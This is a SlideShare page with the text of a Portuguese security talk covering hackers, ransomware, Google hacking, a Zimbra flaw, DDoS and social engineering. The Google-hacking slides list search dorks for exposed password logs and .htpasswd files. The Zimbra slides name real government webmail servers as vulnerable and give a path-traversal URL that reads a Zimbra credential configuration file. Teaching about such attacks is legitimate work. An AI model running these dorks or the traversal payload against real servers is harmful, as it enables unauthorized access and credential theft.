SlideShare uma empresa Scribd logo
1 de 55
Guerra Cibernética 2.0
Dr. Edson Borelli 
CEO da Blackdoor Security, Senior Security Specialist da Futura Networks (Campus 
Party) Analista de Segurança Sênior, Gestor em Segurança da Informação, 
Empreendedor, Especialista em Segurança da Informação a mais de 15 anos. 
Doutor em Segurança da Informação Carnegie Mellon; 
Mestre em redes computacionais em University of Michigan; 
Graduação em Sistemas da Informação Universidade Presbiteriana Mackenzie 
Criou e fundou o LABSS (Laboratório de Segurança e Sustentabilidade – 
MACKENZIE). Palestrante atuante em diversas instituições no país, e também é 
professor em inúmeras universidades e faculdades do Brasil, com os temas Ethical 
Hacker, Cyber Ativismo, Engenharia Social, Cyber Terrorismo, Pedofilia. 
Especialista em Guerra Cibernética, Inteligência Cibernética, Hardenning, Mitigação, 
Firewall, Stress Testing, analise de Vulnerabilidades.
Estrutura
Hackers
Hackers 
➔ Mundiais 
➔ Brasileiros
Ransonware! 
Ranson…. o que?
Google Hacking
Google Hacking 
Google Hacking é a atividade de usar recursos de busca do site, visando atacar ou proteger 
melhor as informações de uma empresa. As informações disponíveis nos servidores web da 
empresa provavelmente estarão nas bases de dados do Google. 
Um servidor mal configurado pode expor diversas informações da empresa no Google. Não é 
difícil conseguir acesso a arquivos de base de dados de sites através do Google. 
site:gov.br ext:SQL
Google Hacking 
http://www.governoeletronico.gov.br/scripts_sql_novos_relatorio 
s/atualizacao_roles.sql
Google Hacking 
Serviços: 
intitle:”VNC Desktop ” inurl:5800 
Informações: 
filetype:log inurl:”password.log” 
Listagem de diretórios: 
intitle:”index of” .htpasswd
Google Hacking 
site:gov intext:”TOP SECRET//” intext:SI|ORCON|NOFORN 
filetype:pdf
Google Hacking 
www.nasa.gov/index.html.old
Zimbra 0Day
Zimbra 0day 
O Zimbra oferece um software de servidor e cliente de código aberto para 
troca de mensagens e colaboração. 
Falha de 2013 continua até hoje em vários servidores zimbra, com uma 
pequena pesquisa no google (Google Hacking) podemos achar vários 
webmail’s zimbra e até então vulneráveis.
Zimbra 0day 
inurl: webmail & intext:zimbra 
https://webmail.salvador.ba.gov.br/ 
https://webmail.unifei.edu.br/ 
https://webmail.seduc.ce.gov.br/zimbra/ 
http://webmail.une.com.co/zimbra/
Zimbra 0day 
http://www.exploit-db.com/exploits/30085/ 
https://webmail.salvador.ba.gov.br/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxK 
eys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450&skin=../ 
../../../../../../../../opt/zimbra/conf/localconfig.xml%00
Zimbra 0day
Zimbra 0day 
Exploit: 
➔ http://www.exploit-db.com/exploits/30085/ 
➔ http://www.exploit-db.com/sploits/zimbraexploit_rubina119.zip 
Explicação e PoC: 
➔ http://securityattack.com.br/emails-do-governo-igrejas-e-empresas-vulneraveis- 
em-ano-de-eleicao/
DDoS
DDoS 
http://securityattack.com.br/.attack
“O motivo para tudo isso? O 
membro que se autointitula 
Chronos explicou ao R7, em 
entrevista exclusiva. 
— A gente decidiu derrubar 
todos os TRE e conseguiu. Nós 
fazemos isso como protesto a 
essa roubalheira que nós 
vivemos.”
Engenharia Social
Engenharia Social 
A arte de enganar
Dr. Edson Borelli 
CEO da Blackdoor Security, Senior Security Specialist da Futura Networks (Campus 
Party) Analista de Segurança Sênior, Gestor em Segurança da Informação, 
Empreendedor, Especialista em Segurança da Informação a mais de 15 anos. 
Doutor em Segurança da Informação Carnegie Mellon; 
Mestre em redes computacionais em University of Michigan; 
Graduação em Sistemas da Informação Universidade Presbiteriana Mackenzie 
Criou e fundou o LABSS (Laboratório de Segurança e Sustentabilidade – 
MACKENZIE). Palestrante atuante em diversas instituições no país, e também é 
professor em inúmeras universidades e faculdades do Brasil, com os temas Ethical 
Hacker, Cyber Ativismo, Engenharia Social, Cyber Terrorismo, Pedofilia. Especialista 
em Guerra Cibernética, Inteligência Cibernética, Hardenning, Mitigação, Firewall, 
Stress Testing, analise de Vulnerabilidades.
Dr. Edson Borelli 
CEO da Blackdoor Security, Senior Security Specialist da Futura Networks (Campus 
Party) Analista de Segurança Sênior, Gestor em Segurança da Informação, 
Empreendedor, Especialista em Segurança da Informação a mais de 15 anos. 
Doutor em Segurança da Informação Carnegie Mellon; 
Mestre em redes computacionais em University of Michigan; 
Graduação em Sistemas da Informação Universidade Presbiteriana Mackenzie 
Criou e fundou o LABSS (Laboratório de Segurança e Sustentabilidade – 
MACKENZIE). Palestrante atuante em diversas instituições no país, e também é 
professor em inúmeras universidades e faculdades do Brasil, com os temas Ethical 
Hacker, Cyber Ativismo, Engenharia Social, Cyber Terrorismo, Pedofilia. Especialista 
em Guerra Cibernética, Inteligência Cibernética, Hardenning, Mitigação, Firewall, 
Stress Testing, analise de Vulnerabilidades.
QR Code
QR Code 
Link 
➔ http://goo.gl/Iwrj5G 
Ver 
➔ http://www.bds3c.com/evento/log.php 
Apagar 
➔ http://www.bds3c.com/evento/log.php?cmd=clear
Engenharia Social 
Marketing 
Direito 
Psicologia
Obrigado!!!
Guerra Cibernética 2.0: Hackers, Ransomware, Google Hacking e mais

Mais conteúdo relacionado

Mais procurados

WEBINAR BE AWARE - Como responder ao crescimento de ameaças como "Ransomware"
WEBINAR BE AWARE - Como responder ao crescimento de ameaças como "Ransomware"WEBINAR BE AWARE - Como responder ao crescimento de ameaças como "Ransomware"
WEBINAR BE AWARE - Como responder ao crescimento de ameaças como "Ransomware"Symantec Brasil
 
Como se tornar um perito investindo menos de R$ 5.000,00
Como se tornar um perito investindo menos de R$ 5.000,00Como se tornar um perito investindo menos de R$ 5.000,00
Como se tornar um perito investindo menos de R$ 5.000,00Data Security
 
[IN]Segurança em Hospitais
[IN]Segurança em Hospitais[IN]Segurança em Hospitais
[IN]Segurança em HospitaisArthur Paixão
 
Desafios da transformação digital
Desafios da transformação digitalDesafios da transformação digital
Desafios da transformação digitalMarcelo Lau
 
Pacote WorkShops em Seguranca da Informacao
Pacote WorkShops em  Seguranca da Informacao  Pacote WorkShops em  Seguranca da Informacao
Pacote WorkShops em Seguranca da Informacao Grupo Treinar
 
A ameaça wanna cry – o que você precisa saber
A ameaça wanna cry – o que você precisa saberA ameaça wanna cry – o que você precisa saber
A ameaça wanna cry – o que você precisa saberMarcelo Lau
 
Coleta de informacoes em redes sociais
Coleta de informacoes em redes sociaisColeta de informacoes em redes sociais
Coleta de informacoes em redes sociaisData Security
 
Modern Healthcare Hacking
Modern Healthcare HackingModern Healthcare Hacking
Modern Healthcare HackingArthur Paixão
 
[In]segurança - Falhas Simples e Grandes Impactos
[In]segurança - Falhas Simples e Grandes Impactos [In]segurança - Falhas Simples e Grandes Impactos
[In]segurança - Falhas Simples e Grandes Impactos Daybson Bruno
 
Ransomware : Sequestro De Dados Digitais
Ransomware : Sequestro De Dados DigitaisRansomware : Sequestro De Dados Digitais
Ransomware : Sequestro De Dados DigitaisMarcelo Lau
 
Como blindar empresas e executivos contra o vazamento de informacoes
Como blindar empresas e executivos contra o vazamento de informacoesComo blindar empresas e executivos contra o vazamento de informacoes
Como blindar empresas e executivos contra o vazamento de informacoesMarcelo Lau
 
Seguranca da informacao ate que ponto as informacoes fiscais estao seguras
Seguranca da informacao   ate que ponto as informacoes fiscais estao segurasSeguranca da informacao   ate que ponto as informacoes fiscais estao seguras
Seguranca da informacao ate que ponto as informacoes fiscais estao segurasData Security
 
Segurança na internet
Segurança na internetSegurança na internet
Segurança na internetDjalda Muniz
 
Segurança na Internet - Estudos de caso
Segurança na Internet - Estudos de casoSegurança na Internet - Estudos de caso
Segurança na Internet - Estudos de casoJoão Gabriel Lima
 
Segurança da Informação: Proteção no ambiente Virtual
Segurança da Informação: Proteção no ambiente VirtualSegurança da Informação: Proteção no ambiente Virtual
Segurança da Informação: Proteção no ambiente VirtualBruno Felipe
 
Segurança nas redes e internet - baixar slides
Segurança nas redes e internet - baixar slidesSegurança nas redes e internet - baixar slides
Segurança nas redes e internet - baixar slidesAna Lúcia Albano
 
Segurança na Internet - Google Hacking
Segurança na Internet - Google  HackingSegurança na Internet - Google  Hacking
Segurança na Internet - Google HackingJoão Gabriel Lima
 
Palestra - Segurança da informação: proteção ou transtorno?
Palestra - Segurança da informação: proteção ou transtorno?Palestra - Segurança da informação: proteção ou transtorno?
Palestra - Segurança da informação: proteção ou transtorno?Edkallenn Lima
 

Mais procurados (20)

WEBINAR BE AWARE - Como responder ao crescimento de ameaças como "Ransomware"
WEBINAR BE AWARE - Como responder ao crescimento de ameaças como "Ransomware"WEBINAR BE AWARE - Como responder ao crescimento de ameaças como "Ransomware"
WEBINAR BE AWARE - Como responder ao crescimento de ameaças como "Ransomware"
 
Como se tornar um perito investindo menos de R$ 5.000,00
Como se tornar um perito investindo menos de R$ 5.000,00Como se tornar um perito investindo menos de R$ 5.000,00
Como se tornar um perito investindo menos de R$ 5.000,00
 
[IN]Segurança em Hospitais
[IN]Segurança em Hospitais[IN]Segurança em Hospitais
[IN]Segurança em Hospitais
 
Desafios da transformação digital
Desafios da transformação digitalDesafios da transformação digital
Desafios da transformação digital
 
Pacote WorkShops em Seguranca da Informacao
Pacote WorkShops em  Seguranca da Informacao  Pacote WorkShops em  Seguranca da Informacao
Pacote WorkShops em Seguranca da Informacao
 
A ameaça wanna cry – o que você precisa saber
A ameaça wanna cry – o que você precisa saberA ameaça wanna cry – o que você precisa saber
A ameaça wanna cry – o que você precisa saber
 
Coleta de informacoes em redes sociais
Coleta de informacoes em redes sociaisColeta de informacoes em redes sociais
Coleta de informacoes em redes sociais
 
Modern Healthcare Hacking
Modern Healthcare HackingModern Healthcare Hacking
Modern Healthcare Hacking
 
[In]segurança - Falhas Simples e Grandes Impactos
[In]segurança - Falhas Simples e Grandes Impactos [In]segurança - Falhas Simples e Grandes Impactos
[In]segurança - Falhas Simples e Grandes Impactos
 
Ransomware : Sequestro De Dados Digitais
Ransomware : Sequestro De Dados DigitaisRansomware : Sequestro De Dados Digitais
Ransomware : Sequestro De Dados Digitais
 
Seminario seguranca da informacao
Seminario seguranca da informacaoSeminario seguranca da informacao
Seminario seguranca da informacao
 
Cyber ​​security for kids
Cyber ​​security for kidsCyber ​​security for kids
Cyber ​​security for kids
 
Como blindar empresas e executivos contra o vazamento de informacoes
Como blindar empresas e executivos contra o vazamento de informacoesComo blindar empresas e executivos contra o vazamento de informacoes
Como blindar empresas e executivos contra o vazamento de informacoes
 
Seguranca da informacao ate que ponto as informacoes fiscais estao seguras
Seguranca da informacao   ate que ponto as informacoes fiscais estao segurasSeguranca da informacao   ate que ponto as informacoes fiscais estao seguras
Seguranca da informacao ate que ponto as informacoes fiscais estao seguras
 
Segurança na internet
Segurança na internetSegurança na internet
Segurança na internet
 
Segurança na Internet - Estudos de caso
Segurança na Internet - Estudos de casoSegurança na Internet - Estudos de caso
Segurança na Internet - Estudos de caso
 
Segurança da Informação: Proteção no ambiente Virtual
Segurança da Informação: Proteção no ambiente VirtualSegurança da Informação: Proteção no ambiente Virtual
Segurança da Informação: Proteção no ambiente Virtual
 
Segurança nas redes e internet - baixar slides
Segurança nas redes e internet - baixar slidesSegurança nas redes e internet - baixar slides
Segurança nas redes e internet - baixar slides
 
Segurança na Internet - Google Hacking
Segurança na Internet - Google  HackingSegurança na Internet - Google  Hacking
Segurança na Internet - Google Hacking
 
Palestra - Segurança da informação: proteção ou transtorno?
Palestra - Segurança da informação: proteção ou transtorno?Palestra - Segurança da informação: proteção ou transtorno?
Palestra - Segurança da informação: proteção ou transtorno?
 

Destaque

EXISTE REALMENTE SEGURANÇA EM CLOUD?
EXISTE REALMENTE SEGURANÇA EM CLOUD?EXISTE REALMENTE SEGURANÇA EM CLOUD?
EXISTE REALMENTE SEGURANÇA EM CLOUD?Leandro Bennaton
 
Seminário Big Data, 19/05/2014 - Apresentação Afonso Coelho
Seminário Big Data, 19/05/2014 - Apresentação Afonso CoelhoSeminário Big Data, 19/05/2014 - Apresentação Afonso Coelho
Seminário Big Data, 19/05/2014 - Apresentação Afonso CoelhoFecomercioSP
 
CYBER SECURITY QUAL É A OPINIÃO DO BRASIL
CYBER SECURITY QUAL É A OPINIÃO DO BRASILCYBER SECURITY QUAL É A OPINIÃO DO BRASIL
CYBER SECURITY QUAL É A OPINIÃO DO BRASILWilliam Beer
 
Study: The Future of VR, AR and Self-Driving Cars
Study: The Future of VR, AR and Self-Driving CarsStudy: The Future of VR, AR and Self-Driving Cars
Study: The Future of VR, AR and Self-Driving CarsLinkedIn
 
Hype vs. Reality: The AI Explainer
Hype vs. Reality: The AI ExplainerHype vs. Reality: The AI Explainer
Hype vs. Reality: The AI ExplainerLuminary Labs
 
Visual Design with Data
Visual Design with DataVisual Design with Data
Visual Design with DataSeth Familian
 

Destaque (7)

EXISTE REALMENTE SEGURANÇA EM CLOUD?
EXISTE REALMENTE SEGURANÇA EM CLOUD?EXISTE REALMENTE SEGURANÇA EM CLOUD?
EXISTE REALMENTE SEGURANÇA EM CLOUD?
 
Seminário Big Data, 19/05/2014 - Apresentação Afonso Coelho
Seminário Big Data, 19/05/2014 - Apresentação Afonso CoelhoSeminário Big Data, 19/05/2014 - Apresentação Afonso Coelho
Seminário Big Data, 19/05/2014 - Apresentação Afonso Coelho
 
CYBER SECURITY QUAL É A OPINIÃO DO BRASIL
CYBER SECURITY QUAL É A OPINIÃO DO BRASILCYBER SECURITY QUAL É A OPINIÃO DO BRASIL
CYBER SECURITY QUAL É A OPINIÃO DO BRASIL
 
Study: The Future of VR, AR and Self-Driving Cars
Study: The Future of VR, AR and Self-Driving CarsStudy: The Future of VR, AR and Self-Driving Cars
Study: The Future of VR, AR and Self-Driving Cars
 
Hype vs. Reality: The AI Explainer
Hype vs. Reality: The AI ExplainerHype vs. Reality: The AI Explainer
Hype vs. Reality: The AI Explainer
 
Visual Design with Data
Visual Design with DataVisual Design with Data
Visual Design with Data
 
Build Features, Not Apps
Build Features, Not AppsBuild Features, Not Apps
Build Features, Not Apps
 

Semelhante a Guerra Cibernética 2.0: Hackers, Ransomware, Google Hacking e mais

1º webminar sobre ransonware para gestores públicos
1º webminar sobre ransonware para gestores públicos1º webminar sobre ransonware para gestores públicos
1º webminar sobre ransonware para gestores públicosGuilherme Neves
 
1º webminar sobre ransonware para gestores públicos
1º webminar sobre ransonware para gestores públicos1º webminar sobre ransonware para gestores públicos
1º webminar sobre ransonware para gestores públicosGuilherme Neves
 
Fatec 2020 Cybersecurity uma visão pratica e objetiva
Fatec 2020   Cybersecurity uma visão pratica e objetivaFatec 2020   Cybersecurity uma visão pratica e objetiva
Fatec 2020 Cybersecurity uma visão pratica e objetivaCLEBER VISCONTI
 
Singularity University 2020 Cybersecurity e trabalho remoto
Singularity University 2020   Cybersecurity e trabalho remotoSingularity University 2020   Cybersecurity e trabalho remoto
Singularity University 2020 Cybersecurity e trabalho remotoCLEBER VISCONTI
 
Conscientização sobre SI
Conscientização sobre SIConscientização sobre SI
Conscientização sobre SIFelipe Perin
 
Unidade 06 introdução a computação - segurança da informação 15-03-03 - 57 ...
Unidade 06   introdução a computação - segurança da informação 15-03-03 - 57 ...Unidade 06   introdução a computação - segurança da informação 15-03-03 - 57 ...
Unidade 06 introdução a computação - segurança da informação 15-03-03 - 57 ...Alex Casañas
 
Unidade 06 introdução a computação - segurança da informação 15-03-03 - 57 ...
Unidade 06   introdução a computação - segurança da informação 15-03-03 - 57 ...Unidade 06   introdução a computação - segurança da informação 15-03-03 - 57 ...
Unidade 06 introdução a computação - segurança da informação 15-03-03 - 57 ...Alex Casañas
 
Tendências na segurança da informação
Tendências na segurança da informaçãoTendências na segurança da informação
Tendências na segurança da informaçãoFabio Leandro
 
Segurança em um Planeta Inteligente
Segurança em um Planeta InteligenteSegurança em um Planeta Inteligente
Segurança em um Planeta InteligenteAlexandre Freire
 
Site blindado - Como tornar loja virtual mais segura e vender mais
Site blindado  - Como tornar loja virtual mais segura e vender maisSite blindado  - Como tornar loja virtual mais segura e vender mais
Site blindado - Como tornar loja virtual mais segura e vender maisMauro Risonho de Paula Assumpcao
 
Site blindado como tornar loja virtual mais segura e vender mais
Site blindado   como tornar loja virtual mais segura e vender maisSite blindado   como tornar loja virtual mais segura e vender mais
Site blindado como tornar loja virtual mais segura e vender maisSite Blindado S.A.
 
Segurança em aplicativos móveis de comunicação - Cnasi 2016
Segurança em aplicativos móveis de comunicação - Cnasi 2016Segurança em aplicativos móveis de comunicação - Cnasi 2016
Segurança em aplicativos móveis de comunicação - Cnasi 2016Tiago Tavares
 
Testes de segurança desafios e oportunidades
Testes de segurança desafios e oportunidadesTestes de segurança desafios e oportunidades
Testes de segurança desafios e oportunidadesQualister
 
Desafios Futuros e Oportunidades
Desafios Futuros e OportunidadesDesafios Futuros e Oportunidades
Desafios Futuros e OportunidadesMarcio Cunha
 
Segurança em aplicações web: pequenas ideias, grandes resultados
Segurança em aplicações web: pequenas ideias, grandes resultadosSegurança em aplicações web: pequenas ideias, grandes resultados
Segurança em aplicações web: pequenas ideias, grandes resultadosAlex Camargo
 

Semelhante a Guerra Cibernética 2.0: Hackers, Ransomware, Google Hacking e mais (20)

7 segredos sobre o PenTest e software livre - VI Engitec
7 segredos sobre o PenTest e software livre - VI Engitec 7 segredos sobre o PenTest e software livre - VI Engitec
7 segredos sobre o PenTest e software livre - VI Engitec
 
1º webminar sobre ransonware para gestores públicos
1º webminar sobre ransonware para gestores públicos1º webminar sobre ransonware para gestores públicos
1º webminar sobre ransonware para gestores públicos
 
1º webminar sobre ransonware para gestores públicos
1º webminar sobre ransonware para gestores públicos1º webminar sobre ransonware para gestores públicos
1º webminar sobre ransonware para gestores públicos
 
Fatec 2020 Cybersecurity uma visão pratica e objetiva
Fatec 2020   Cybersecurity uma visão pratica e objetivaFatec 2020   Cybersecurity uma visão pratica e objetiva
Fatec 2020 Cybersecurity uma visão pratica e objetiva
 
Singularity University 2020 Cybersecurity e trabalho remoto
Singularity University 2020   Cybersecurity e trabalho remotoSingularity University 2020   Cybersecurity e trabalho remoto
Singularity University 2020 Cybersecurity e trabalho remoto
 
Conscientização sobre SI
Conscientização sobre SIConscientização sobre SI
Conscientização sobre SI
 
Unidade 06 introdução a computação - segurança da informação 15-03-03 - 57 ...
Unidade 06   introdução a computação - segurança da informação 15-03-03 - 57 ...Unidade 06   introdução a computação - segurança da informação 15-03-03 - 57 ...
Unidade 06 introdução a computação - segurança da informação 15-03-03 - 57 ...
 
Unidade 06 introdução a computação - segurança da informação 15-03-03 - 57 ...
Unidade 06   introdução a computação - segurança da informação 15-03-03 - 57 ...Unidade 06   introdução a computação - segurança da informação 15-03-03 - 57 ...
Unidade 06 introdução a computação - segurança da informação 15-03-03 - 57 ...
 
Palestra Segurança da Informação e Servidores
Palestra Segurança da Informação e ServidoresPalestra Segurança da Informação e Servidores
Palestra Segurança da Informação e Servidores
 
Tendências na segurança da informação
Tendências na segurança da informaçãoTendências na segurança da informação
Tendências na segurança da informação
 
Segurança em um Planeta Inteligente
Segurança em um Planeta InteligenteSegurança em um Planeta Inteligente
Segurança em um Planeta Inteligente
 
Proinfo 24 06-2013
Proinfo 24 06-2013Proinfo 24 06-2013
Proinfo 24 06-2013
 
Como funcionam as ameaças da internet e o cybercrime
Como funcionam as ameaças da internet e o cybercrimeComo funcionam as ameaças da internet e o cybercrime
Como funcionam as ameaças da internet e o cybercrime
 
Site blindado - Como tornar loja virtual mais segura e vender mais
Site blindado  - Como tornar loja virtual mais segura e vender maisSite blindado  - Como tornar loja virtual mais segura e vender mais
Site blindado - Como tornar loja virtual mais segura e vender mais
 
Site blindado como tornar loja virtual mais segura e vender mais
Site blindado   como tornar loja virtual mais segura e vender maisSite blindado   como tornar loja virtual mais segura e vender mais
Site blindado como tornar loja virtual mais segura e vender mais
 
Segurança em aplicativos móveis de comunicação - Cnasi 2016
Segurança em aplicativos móveis de comunicação - Cnasi 2016Segurança em aplicativos móveis de comunicação - Cnasi 2016
Segurança em aplicativos móveis de comunicação - Cnasi 2016
 
Testes de segurança desafios e oportunidades
Testes de segurança desafios e oportunidadesTestes de segurança desafios e oportunidades
Testes de segurança desafios e oportunidades
 
Desafios Futuros e Oportunidades
Desafios Futuros e OportunidadesDesafios Futuros e Oportunidades
Desafios Futuros e Oportunidades
 
Boas Práticas em Segurança da Informação
Boas Práticas em Segurança da InformaçãoBoas Práticas em Segurança da Informação
Boas Práticas em Segurança da Informação
 
Segurança em aplicações web: pequenas ideias, grandes resultados
Segurança em aplicações web: pequenas ideias, grandes resultadosSegurança em aplicações web: pequenas ideias, grandes resultados
Segurança em aplicações web: pequenas ideias, grandes resultados
 

Guerra Cibernética 2.0: Hackers, Ransomware, Google Hacking e mais

  • 2. Dr. Edson Borelli CEO da Blackdoor Security, Senior Security Specialist da Futura Networks (Campus Party) Analista de Segurança Sênior, Gestor em Segurança da Informação, Empreendedor, Especialista em Segurança da Informação a mais de 15 anos. Doutor em Segurança da Informação Carnegie Mellon; Mestre em redes computacionais em University of Michigan; Graduação em Sistemas da Informação Universidade Presbiteriana Mackenzie Criou e fundou o LABSS (Laboratório de Segurança e Sustentabilidade – MACKENZIE). Palestrante atuante em diversas instituições no país, e também é professor em inúmeras universidades e faculdades do Brasil, com os temas Ethical Hacker, Cyber Ativismo, Engenharia Social, Cyber Terrorismo, Pedofilia. Especialista em Guerra Cibernética, Inteligência Cibernética, Hardenning, Mitigação, Firewall, Stress Testing, analise de Vulnerabilidades.
  • 4.
  • 5.
  • 6.
  • 7.
  • 8.
  • 10. Hackers ➔ Mundiais ➔ Brasileiros
  • 12.
  • 13.
  • 15. Google Hacking Google Hacking é a atividade de usar recursos de busca do site, visando atacar ou proteger melhor as informações de uma empresa. As informações disponíveis nos servidores web da empresa provavelmente estarão nas bases de dados do Google. Um servidor mal configurado pode expor diversas informações da empresa no Google. Não é difícil conseguir acesso a arquivos de base de dados de sites através do Google. site:gov.br ext:SQL
  • 17. Google Hacking Serviços: intitle:”VNC Desktop ” inurl:5800 Informações: filetype:log inurl:”password.log” Listagem de diretórios: intitle:”index of” .htpasswd
  • 18. Google Hacking site:gov intext:”TOP SECRET//” intext:SI|ORCON|NOFORN filetype:pdf
  • 20.
  • 21.
  • 22.
  • 24. Zimbra 0day O Zimbra oferece um software de servidor e cliente de código aberto para troca de mensagens e colaboração. Falha de 2013 continua até hoje em vários servidores zimbra, com uma pequena pesquisa no google (Google Hacking) podemos achar vários webmail’s zimbra e até então vulneráveis.
  • 25. Zimbra 0day inurl: webmail & intext:zimbra https://webmail.salvador.ba.gov.br/ https://webmail.unifei.edu.br/ https://webmail.seduc.ce.gov.br/zimbra/ http://webmail.une.com.co/zimbra/
  • 26. Zimbra 0day http://www.exploit-db.com/exploits/30085/ https://webmail.salvador.ba.gov.br/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxK eys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450&skin=../ ../../../../../../../../opt/zimbra/conf/localconfig.xml%00
  • 28. Zimbra 0day Exploit: ➔ http://www.exploit-db.com/exploits/30085/ ➔ http://www.exploit-db.com/sploits/zimbraexploit_rubina119.zip Explicação e PoC: ➔ http://securityattack.com.br/emails-do-governo-igrejas-e-empresas-vulneraveis- em-ano-de-eleicao/
  • 29. DDoS
  • 30.
  • 31.
  • 32.
  • 33.
  • 34.
  • 35.
  • 37. “O motivo para tudo isso? O membro que se autointitula Chronos explicou ao R7, em entrevista exclusiva. — A gente decidiu derrubar todos os TRE e conseguiu. Nós fazemos isso como protesto a essa roubalheira que nós vivemos.”
  • 39. Engenharia Social A arte de enganar
  • 40. Dr. Edson Borelli CEO da Blackdoor Security, Senior Security Specialist da Futura Networks (Campus Party) Analista de Segurança Sênior, Gestor em Segurança da Informação, Empreendedor, Especialista em Segurança da Informação a mais de 15 anos. Doutor em Segurança da Informação Carnegie Mellon; Mestre em redes computacionais em University of Michigan; Graduação em Sistemas da Informação Universidade Presbiteriana Mackenzie Criou e fundou o LABSS (Laboratório de Segurança e Sustentabilidade – MACKENZIE). Palestrante atuante em diversas instituições no país, e também é professor em inúmeras universidades e faculdades do Brasil, com os temas Ethical Hacker, Cyber Ativismo, Engenharia Social, Cyber Terrorismo, Pedofilia. Especialista em Guerra Cibernética, Inteligência Cibernética, Hardenning, Mitigação, Firewall, Stress Testing, analise de Vulnerabilidades.
  • 41. Dr. Edson Borelli CEO da Blackdoor Security, Senior Security Specialist da Futura Networks (Campus Party) Analista de Segurança Sênior, Gestor em Segurança da Informação, Empreendedor, Especialista em Segurança da Informação a mais de 15 anos. Doutor em Segurança da Informação Carnegie Mellon; Mestre em redes computacionais em University of Michigan; Graduação em Sistemas da Informação Universidade Presbiteriana Mackenzie Criou e fundou o LABSS (Laboratório de Segurança e Sustentabilidade – MACKENZIE). Palestrante atuante em diversas instituições no país, e também é professor em inúmeras universidades e faculdades do Brasil, com os temas Ethical Hacker, Cyber Ativismo, Engenharia Social, Cyber Terrorismo, Pedofilia. Especialista em Guerra Cibernética, Inteligência Cibernética, Hardenning, Mitigação, Firewall, Stress Testing, analise de Vulnerabilidades.
  • 43.
  • 44. QR Code Link ➔ http://goo.gl/Iwrj5G Ver ➔ http://www.bds3c.com/evento/log.php Apagar ➔ http://www.bds3c.com/evento/log.php?cmd=clear
  • 45. Engenharia Social Marketing Direito Psicologia
  • 46.
  • 47.
  • 48.
  • 49.
  • 50.
  • 51.
  • 52.
  • 53.